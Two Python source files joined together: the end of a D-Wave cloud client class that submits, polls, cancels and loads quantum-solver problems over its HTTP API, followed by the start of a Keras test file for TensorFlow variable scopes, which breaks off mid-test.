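Example (an illustrative sketch of a subclass override; ``Client`` stands in
for this class, and the id prefix checked below is hypothetical):

    class SoftwareOnlyClient(Client):
        @staticmethod
        def is_solver_handled(solver):
            # Accept only solvers whose id marks them as software solvers.
            return solver.id.startswith('sw_')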
"""
return True
def get_solvers(self, refresh=False):
"""List all the solvers this client can provide, and load the data
about the solvers.
This is a blocking web call to ``{endpoint}/solvers/remote/`` that
caches the result and populates a list of available solvers described
through :class:`.Solver` instances.
To submit a sampling problem to the D-Wave API, filter the list returned
and execute a ``sampling_*`` method on the solver of interest.
Alternatively, if you know the solver name (or it's defined in config),
use the :meth:`.get_solver` method.
Args:
refresh (bool, default=False):
By default, ``get_solvers`` caches the list of solvers it
receives from the API. Use this parameter to force refresh.
Returns:
dict[id, solver]: a mapping of solver name/id to :class:`.Solver`
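Example (illustrative; ``client`` is an already-constructed client object):

    solvers = client.get_solvers()              # cached after the first call
    solvers = client.get_solvers(refresh=True)  # force a re-download
    names = sorted(solvers)                     # solver names/ids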
"""
with self._solvers_lock:
if self._all_solvers_ready and not refresh:
return self._solvers
_LOGGER.debug("Requesting list of all solver data.")
response = self.session.get(
posixpath.join(self.endpoint, 'solvers/remote/'))
if response.status_code == 401:
raise SolverAuthenticationError
response.raise_for_status()
_LOGGER.debug("Received list of all solver data.")
data = response.json()
for solver_desc in data:
try:
solver = Solver(self, solver_desc)
if self.is_solver_handled(solver):
self._solvers[solver.id] = solver
_LOGGER.debug("Adding solver %r", solver)
else:
_LOGGER.debug("Skipping solver %r inappropriate for client", solver)
except UnsupportedSolverError as e:
_LOGGER.debug("Skipping solver due to %r", e)
self._all_solvers_ready = True
return self._solvers
def get_solver(self, name=None, refresh=False):
"""Load the configuration for a single solver, as publicized by the API
on ``{endpoint}/solvers/remote/{solver_name}/``.
This is a blocking web call that returns a :class:`.Solver` instance,
which in turn can be used to submit sampling problems to the D-Wave API
and fetch the results.
Args:
name (str):
Id of the requested solver. ``None`` will return the default solver.
refresh (bool):
Return solver from cache (if cached with ``get_solvers()``),
unless set to ``True``.
Returns:
:class:`.Solver`
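Example (illustrative; the solver name below is a placeholder):

    solver = client.get_solver()                       # default solver, if configured
    solver = client.get_solver(name='example-solver')  # a specific solver by name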
"""
_LOGGER.debug("Looking for solver: %s", name)
if name is None:
if self.default_solver:
name = self.default_solver
else:
raise ValueError("No name or default name provided when loading solver.")
with self._solvers_lock:
if refresh or name not in self._solvers:
response = self.session.get(
posixpath.join(self.endpoint, 'solvers/remote/{}/'.format(name)))
if response.status_code == 401:
raise SolverAuthenticationError
if response.status_code == 404:
raise KeyError("No solver with the name {} was available".format(name))
response.raise_for_status()
solver = Solver(self, data=response.json())
if solver.id != name:
raise InvalidAPIResponseError(
"Asked for solver named {!r}, got {!r}".format(name, solver.id))
self._solvers[name] = solver
return self._solvers[name]
def _submit(self, body, future):
"""Enqueue a problem for submission to the server.
This method is thread safe.
"""
self._submission_queue.put(self._submit.Message(body, future))
_submit.Message = collections.namedtuple('Message', ['body', 'future'])
def _do_submit_problems(self):
"""Pull problems from the submission queue and submit them.
Note:
This method is always run inside of a daemon thread.
"""
try:
while True:
# Pull as many problems as we can, block on the first one,
# but once we have one problem, switch to non-blocking then
# submit without blocking again.
# `None` task is used to signal thread termination
item = self._submission_queue.get()
if item is None:
break
ready_problems = [item]
while True:
try:
ready_problems.append(self._submission_queue.get_nowait())
except queue.Empty:
break
# Submit the problems
_LOGGER.debug("submitting {} problems".format(len(ready_problems)))
body = '[' + ','.join(mess.body for mess in ready_problems) + ']'
try:
response = self.session.post(posixpath.join(self.endpoint, 'problems/'), body)
if response.status_code == 401:
raise SolverAuthenticationError()
response.raise_for_status()
message = response.json()
_LOGGER.debug("Finished submitting {} problems".format(len(ready_problems)))
except BaseException as exception:
if not isinstance(exception, SolverAuthenticationError):
exception = IOError(exception)
for mess in ready_problems:
mess.future._set_error(exception, sys.exc_info())
self._submission_queue.task_done()
continue
# Pass on the information
for submission, res in zip(ready_problems, message):
self._handle_problem_status(res, submission.future, False)
self._submission_queue.task_done()
# this is equivalent to a yield to scheduler in other threading libraries
time.sleep(0)
except BaseException as err:
_LOGGER.exception(err)
def _handle_problem_status(self, message, future, in_poll):
"""Handle the results of a problem submission or results request.
This method checks the status of the problem and puts it in the correct queue.
Args:
message (dict): Update message from the SAPI server regarding this problem.
future (:class:`Future`): Future corresponding to the problem.
in_poll (bool): Flag set to True if the problem is already in the poll loop.
Returns:
True if the problem has been processed out of the status poll loop.
Note:
This method is always run inside of a daemon thread.
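Example of the general message shape this method consumes (keys other than
``id`` and ``status`` are optional; the literal values shown are placeholders):

    {
        "id": "<problem id>",
        "status": "<one of the STATUS_* / ANY_STATUS_ONGOING values>",
        "submitted_on": "<timestamp>",
        "solved_on": "<timestamp>",
        "answer": {...},                 # present once results are attached
        "error_message": "<details>",    # present on failure
    }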
"""
try:
status = message['status']
_LOGGER.debug("Status: %s %s", message['id'], status)
# The future may not have the ID set yet
with future._single_cancel_lock:
# This handles the case where cancel has been called on a future
# before that future received the problem id
if future._cancel_requested:
if not future._cancel_sent and status == self.STATUS_PENDING:
# The problem has been canceled, but the status says it is
# still in the queue, so try to cancel it
self._cancel(message['id'], future)
# If a cancel request could meaningfully be sent, it has been sent by now
future._cancel_sent = True
# Set the id field in the future
future.id = message['id']
future.remote_status = status
# Record server-side timestamps the first time they appear in a message.
# NOTE: the timestamp format below is an assumption (ISO 8601 without a
# timezone offset); adjust it to whatever format the server actually returns.
if future.time_received is None and message.get('submitted_on') is not None:
    future.time_received = datetime.strptime(message['submitted_on'], '%Y-%m-%dT%H:%M:%S.%f')
if future.time_solved is None and message.get('solved_on') is not None:
    future.time_solved = datetime.strptime(message['solved_on'], '%Y-%m-%dT%H:%M:%S.%f')
if status == self.STATUS_COMPLETE:
# If the message is complete, forward it to the future object
if 'answer' in message:
future._set_message(message)
# If the problem is complete, but we don't have the result data
# put the problem in the queue for loading results.
else:
self._load(future)
elif status in self.ANY_STATUS_ONGOING:
# If the response is pending add it to the queue.
if not in_poll:
self._poll(future)
return False
elif status == self.STATUS_CANCELLED:
# If canceled return error
future._set_error(CanceledFutureError())
else:
# Return an error to the future object
future._set_error(SolverFailureError(message.get('error_message', 'An unknown error has occurred.')))
except Exception as error:
# If there were any unhandled errors we need to release the
# lock in the future, otherwise deadlock occurs.
future._set_error(error, sys.exc_info())
return True
def _cancel(self, id_, future):
"""Enqueue a problem to be canceled.
This method is thread safe.
"""
self._cancel_queue.put((id_, future))
def _do_cancel_problems(self):
"""Pull ids from the cancel queue and submit them.
Note:
This method is always run inside of a daemon thread.
"""
try:
while True:
# Pull as many problems as we can, block when none are available.
# `None` task is used to signal thread termination
item = self._cancel_queue.get()
if item is None:
break
item_list = [item]
while True:
try:
item_list.append(self._cancel_queue.get_nowait())
except queue.Empty:
break
# Submit the problems, attach the ids as a json list in the
# body of the delete query.
try:
body = [item[0] for item in item_list]
self.session.delete(posixpath.join(self.endpoint, 'problems/'), json=body)
except Exception as err:
for _, future in item_list:
if future is not None:
future._set_error(err, sys.exc_info())
# Mark all the ids as processed regardless of success or failure.
[self._cancel_queue.task_done() for _ in item_list]
# this is equivalent to a yield to scheduler in other threading libraries
time.sleep(0)
except Exception as err:
_LOGGER.exception(err)
def _poll(self, future):
"""Enqueue a problem to poll the server for status.
This method is threadsafe.
"""
self._poll_queue.put(future)
def _do_poll_problems(self):
"""Poll the server for the status of a set of problems.
Note:
This method is always run inside of a daemon thread.
"""
try:
# Maintain an active group of queries
futures = {}
active_queries = set()
# Add a query to the active queries
def add(ftr):
# `None` task signifies thread termination
if ftr is None:
return False
if ftr.id not in futures and not ftr.done():
active_queries.add(ftr.id)
futures[ftr.id] = ftr
else:
self._poll_queue.task_done()
return True
# Remove a query from the active set
def remove(id_):
del futures[id_]
active_queries.remove(id_)
self._poll_queue.task_done()
while True:
try:
# If we have no active queries, wait on the status queue
while len(active_queries) == 0:
if not add(self._poll_queue.get()):
return
# Once there are active queries, try to fill up the set and move on
while len(active_queries) < self._STATUS_QUERY_SIZE:
if not add(self._poll_queue.get_nowait()):
return
except queue.Empty:
pass
# Build a query string with a block of ids
_LOGGER.debug("Query on futures: %s", ', '.join(active_queries))
query_string = 'problems/?id=' + ','.join(active_queries)
try:
response = self.session.get(posixpath.join(self.endpoint, query_string))
if response.status_code == 401:
raise SolverAuthenticationError()
response.raise_for_status()
message = response.json()
except BaseException as exception:
if not isinstance(exception, SolverAuthenticationError):
exception = IOError(exception)
for id_ in list(active_queries):
futures[id_]._set_error(exception, sys.exc_info())
remove(id_)
continue
# If problems are removed from the polling by _handle_problem_status
# remove them from the active set
for single_message in message:
if self._handle_problem_status(single_message, futures[single_message['id']], True):
remove(single_message['id'])
# Remove the finished queries
for id_ in list(active_queries):
if futures[id_].done():
remove(id_)
# this is equivalent to a yield to scheduler in other threading libraries
time.sleep(0)
except Exception as err:
_LOGGER.exception(err)
def _load(self, future):
"""Enqueue a problem to download results from the server.
Args:
future: :class:`Future` object corresponding to the query
This method is threadsafe.
"""
self._load_queue.put(future)
def _do_load_results(self):
"""Submit a query asking for the results for a particular problem.
To request the results of a problem: ``GET /problems/{problem_id}/``
Note:
This method is always run inside of a daemon thread.
"""
try:
while True:
# Select a problem
future = self._load_queue.get()
# `None` task signifies thread termination
if future is None:
break
_LOGGER.debug("Query for results: %s", future.id)
# Submit the query
query_string = 'problems/{}/'.format(future.id)
try:
response = self.session.get(posixpath.join(self.endpoint, query_string))
if response.status_code == 401:
raise SolverAuthenticationError()
response.raise_for_status()
message = response.json()
except BaseException as exception:
if not isinstance(exception, SolverAuthenticationError):
exception = IOError(exception)
future._set_error(exception, sys.exc_info())
continue
# Dispatch the results, mark the task complete
self._handle_problem_status(message, future, False)
self._load_queue.task_done()
# this is equivalent to a yield to scheduler in other threading libraries
time.sleep(0)
except Exception as err:
_LOGGER.error('Load result error: ' + str(err))
|
variable_scope_shim_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for variable store."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
import gc
import threading
from absl.testing import parameterized
import numpy
from tensorflow.python.framework import test_util
from keras import combinations
from keras import regularizers
from keras.engine import input_layer as input_layer_module
from keras.engine import training as training_module
from keras.layers import core
from keras.legacy_tf_layers import core as core_layers
from keras.legacy_tf_layers import variable_scope_shim
from tensorflow.python.ops import variable_scope
def run_inside_wrap_function_in_eager_mode(graph_function):
"""Decorator to execute the same graph code in eager and graph modes.
In graph mode, the graph_function passed as argument is executed as-is. In
eager mode, the function is executed inside a scoped ``_EagerVariableStore``
so that ``get_variable`` calls are routed through that store.
Args:
graph_function: python function containing graph code to be wrapped
Returns:
decorated function
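Example (this mirrors how the test methods below apply the decorator):

    @test_util.run_in_graph_and_eager_modes
    @run_inside_wrap_function_in_eager_mode
    def testSomething(self):
        v = tf.compat.v1.get_variable("v", [1])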
"""
def wrap_and_execute(self):
store = variable_scope_shim._EagerVariableStore()
with variable_scope.with_variable_store(store):
# use the original function
graph_function(self)
return wrap_and_execute
class VariableScopeTest(tf.test.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
self.assertEqual(0, len(gc.garbage))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVar(self):
vs = variable_scope._get_default_variable_store()
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertIs(v, v1)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNameExists(self):
vs = variable_scope._get_default_variable_store()
# No check by default, so we can both create and get existing names.
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertIs(v, v1)
self.assertIsNot(v, vs.get_variable("u", [1], reuse=False))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNamelessStore(self):
vs = variable_scope._get_default_variable_store()
vs.get_variable("v1", [2])
vs.get_variable("v2", [2])
expected_names = ["%s:0" % name for name in ["v1", "v2"]]
self.assertEqual(
set(expected_names), set(v.name for v in vs._vars.values()))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Expected tf.group() expected Tensor arguments not 'None' with
# type '<type 'NoneType'>'
@test_util.run_in_graph_and_eager_modes
def testVarScopeInitializer(self):
init = tf.compat.v1.constant_initializer(0.3)
with tf.compat.v1.variable_scope("tower0") as tower:
with tf.compat.v1.variable_scope("foo", initializer=init):
v = tf.compat.v1.get_variable("v", [])
self.evaluate(tf.compat.v1.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
with tf.compat.v1.variable_scope(tower, initializer=init):
w = tf.compat.v1.get_variable("w", [])
self.evaluate(tf.compat.v1.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeConstraint(self):
constraint = lambda x: 0. * x
with tf.compat.v1.variable_scope("tower1") as tower:
with tf.compat.v1.variable_scope("foo", constraint=constraint):
v = tf.compat.v1.get_variable("v", [])
self.assertIsNotNone(v.constraint)
with tf.compat.v1.variable_scope(tower, constraint=constraint):
w = tf.compat.v1.get_variable("w", [])
self.assertIsNotNone(w.constraint)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeDType(self):
with tf.compat.v1.variable_scope("tower2") as tower:
with tf.compat.v1.variable_scope("foo", dtype=tf.float16):
v = tf.compat.v1.get_variable("v", [])
self.assertEqual(v.dtype.base_dtype, tf.float16)
with tf.compat.v1.variable_scope(tower, dtype=tf.float16):
w = tf.compat.v1.get_variable("w", [])
self.assertEqual(w.dtype.base_dtype, tf.float16)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testInitFromNonTensorValue(self):
v = tf.compat.v1.get_variable("v4", initializer=4, dtype=tf.int32)
self.evaluate(tf.compat.v1.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 4)
w = tf.compat.v1.get_variable(
"w4", initializer=numpy.array([1, 2, 3]), dtype=tf.int64)
self.evaluate(tf.compat.v1.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), [1, 2, 3])
# A quirk to be revisited?
error = ValueError if tf.executing_eagerly() else TypeError
with self.assertRaises(error):
tf.compat.v1.get_variable("x4", initializer={})
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testInitFromNonInitializer(self):
# Test various dtypes with a zeros initializer, as follows:
types = [
tf.int8, tf.uint8, tf.int16, tf.uint16, tf.int32,
tf.int64, tf.bool
]
# Use different variable_name to distinguish various dtypes
for (i, dtype) in enumerate(types):
x = tf.compat.v1.get_variable(
name="xx%d" % i, shape=(3, 4), dtype=dtype)
y = tf.compat.v1.get_variable(
name="yy%d" % i,
shape=(3, 4),
dtype=dtype,
initializer=tf.compat.v1.zeros_initializer(dtype=dtype))
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertAllEqual(self.evaluate(x.value()), self.evaluate(y.value()))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeRegularizer(self):
init = tf.compat.v1.constant_initializer(0.3)
def regularizer1(v):
return tf.reduce_mean(v) + 0.1
def regularizer2(v):
return tf.reduce_mean(v) + 0.2
with tf.compat.v1.variable_scope(
"tower3", regularizer=regularizer1) as tower:
with tf.compat.v1.variable_scope("foo", initializer=init):
v = tf.compat.v1.get_variable("v", [])
self.evaluate(tf.compat.v1.variables_initializer([v]))
with tf.compat.v1.variable_scope(tower, initializer=init) as vs:
tf.compat.v1.get_variable("u", [])
vs.set_regularizer(regularizer2)
tf.compat.v1.get_variable("w", [])
# Next 3 variables are not regularized, to test disabling regularization.
tf.compat.v1.get_variable(
"x", [], regularizer=tf.compat.v1.no_regularizer)
with tf.compat.v1.variable_scope(
"baz", regularizer=tf.compat.v1.no_regularizer):
tf.compat.v1.get_variable("y", [])
vs.set_regularizer(tf.compat.v1.no_regularizer)
tf.compat.v1.get_variable("z", [])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testInitializeFromValue(self):
init = tf.constant(0.1)
w = tf.compat.v1.get_variable("v", initializer=init)
self.evaluate(tf.compat.v1.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.1)
with self.assertRaisesRegex(ValueError, "shape"):
# We disallow explicit shape specification when initializer is constant.
tf.compat.v1.get_variable("u", [1], initializer=init)
with tf.compat.v1.variable_scope("foo", initializer=init):
# Constant initializer can be passed through scopes if needed.
v = tf.compat.v1.get_variable("v")
self.evaluate(tf.compat.v1.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.1)
# Check that non-float32 initializer creates a non-float32 variable.
init = tf.constant(1, dtype=tf.int32)
t = tf.compat.v1.get_variable("t", initializer=init)
self.assertEqual(t.dtype.base_dtype, tf.int32)
# Raise error if `initializer` dtype and `dtype` are not identical.
with self.assertRaisesRegex(ValueError, "don't match"):
tf.compat.v1.get_variable("s", initializer=init, dtype=tf.float64)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetOrCreateReuse(self):
with self.cached_session():
def test_value(value):
x = tf.constant(value)
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=tf.compat.v1.AUTO_REUSE):
_ = tf.compat.v1.assign(tf.compat.v1.get_variable("var", []), x)
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=tf.compat.v1.AUTO_REUSE):
_ = tf.compat.v1.get_variable("var", [])
self.assertEqual(value, self.evaluate(x))
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetOrCreateReuseIgnoreFalse(self):
with self.cached_session():
def test_value(value):
x = tf.constant(value)
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=False):
_ = tf.compat.v1.assign(tf.compat.v1.get_variable("var", []), x)
# We need to ignore reuse=False in the shim, because the
# code is expected to get rerun each time the user calls the shim.
with tf.compat.v1.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=False):
_ = tf.compat.v1.get_variable("var", [])
self.assertEqual(value, self.evaluate(x))
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScope(self):
with self.cached_session():
with tf.name_scope("testVarOpScope1"):
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "tower/w:0")
with tf.name_scope("testVarOpScope2"):
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default_1/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesInterleavedSubstringScopes(self):
with self.cached_session():
with tf.compat.v1.variable_scope(None, "defaultScope1"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope1/layer/w:0")
with tf.compat.v1.variable_scope(None, "defaultScope1"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope1_1/layer/w:0")
with tf.compat.v1.variable_scope(None, "defaultScope"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope/layer/w:0")
with tf.compat.v1.variable_scope(None, "defaultScope1"):
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"defaultScope1_2/layer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesWithJump(self):
with self.cached_session():
with tf.compat.v1.variable_scope("default") as default:
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default/layer/w:0")
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"default/layer_1/w:0")
with tf.compat.v1.variable_scope(default):
pass
# No matter the jump in the middle, unique numbering continues.
with tf.compat.v1.variable_scope(None, "layer"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name,
"default/layer_2/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuse(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, reuse=True) as outer:
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetVar(self):
with self.cached_session():
with tf.compat.v1.variable_scope("root"):
with tf.compat.v1.variable_scope("towerA") as tower_a:
va = tf.compat.v1.get_variable("v", [1])
self.assertEqual(va.name, "root/towerA/v:0")
with tf.compat.v1.variable_scope(tower_a, reuse=True):
va2 = tf.compat.v1.get_variable("v", [1])
self.assertIs(va2, va)
with tf.compat.v1.variable_scope("towerB"):
vb = tf.compat.v1.get_variable("v", [1])
self.assertEqual(vb.name, "root/towerB/v:0")
with tf.compat.v1.variable_scope("towerA", reuse=True):
va2 = tf.compat.v1.get_variable("v", [1])
self.assertIs(va2, va)
with tf.compat.v1.variable_scope("foo"):
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [1])
self.assertEqual(v.name, "root/foo/bar/v:0")
with tf.compat.v1.variable_scope(tower_a, reuse=True):
va3 = tf.compat.v1.get_variable("v", [1])
self.assertIs(va, va3)
with self.assertRaises(ValueError) as exc:
with tf.compat.v1.variable_scope(tower_a, reuse=True):
tf.compat.v1.get_variable("v", [2]) # Different shape.
self.assertEqual("shape" in str(exc.exception), True)
with self.assertRaises(ValueError) as exc:
with tf.compat.v1.variable_scope(tower_a, reuse=True):
tf.compat.v1.get_variable("v", [1], dtype=tf.int32)
self.assertEqual("dtype" in str(exc.exception), True)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
pass
with tf.compat.v1.variable_scope(outer):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNestedOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope(outer):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default"):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope("default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseParam(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope("tower", "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer) as outer:
with tf.compat.v1.variable_scope("tower", "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
outer.reuse_variables()
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseError(self):
with self.cached_session():
with self.assertRaises(ValueError):
with tf.compat.v1.variable_scope(None, "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
pass
with tf.compat.v1.variable_scope(outer, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
outer.reuse_variables()
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeNestedOuterScope(self):
with self.cached_session():
with tf.compat.v1.variable_scope("outer") as outer:
with tf.compat.v1.variable_scope(outer, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
with tf.compat.v1.variable_scope(outer, "default", reuse=True):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/w:0")
with tf.compat.v1.variable_scope(None, "default", []):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testBasicWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with tf.compat.v1.variable_scope(
"scope", auxiliary_name_scope=False) as scope:
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "scope/w:0")
with tf.compat.v1.variable_scope(scope, auxiliary_name_scope=False):
self.assertEqual(
tf.compat.v1.get_variable("w1", []).name, "scope/w1:0")
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope(
"inner", auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/inner/w:0")
with tf.compat.v1.variable_scope(
inner, auxiliary_name_scope=False) as inner1:
self.assertEqual(inner1.original_name_scope, "outer/")
self.assertEqual(
tf.compat.v1.get_variable("w1", []).name, "outer/inner/w1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCreatedByDefaultNameWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with tf.compat.v1.variable_scope(
None, default_name="default", auxiliary_name_scope=False):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "default/w:0")
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope(
None, default_name="default",
auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterRootScopeWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
root_scope = tf.compat.v1.get_variable_scope()
with tf.compat.v1.variable_scope(
root_scope, auxiliary_name_scope=False):
self.assertEqual(tf.compat.v1.get_variable("w", []).name, "w:0")
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope(
root_scope, auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "")
self.assertEqual(tf.compat.v1.get_variable("w1", []).name, "w1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAuxiliaryNameScopeIsInvalid(self):
with self.cached_session():
with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
with tf.compat.v1.variable_scope(
None, default_name="scope", auxiliary_name_scope="invalid"):
pass
with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
with tf.compat.v1.variable_scope(
"scope", auxiliary_name_scope="invalid"):
pass
with tf.compat.v1.variable_scope("scope") as scope:
pass
with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
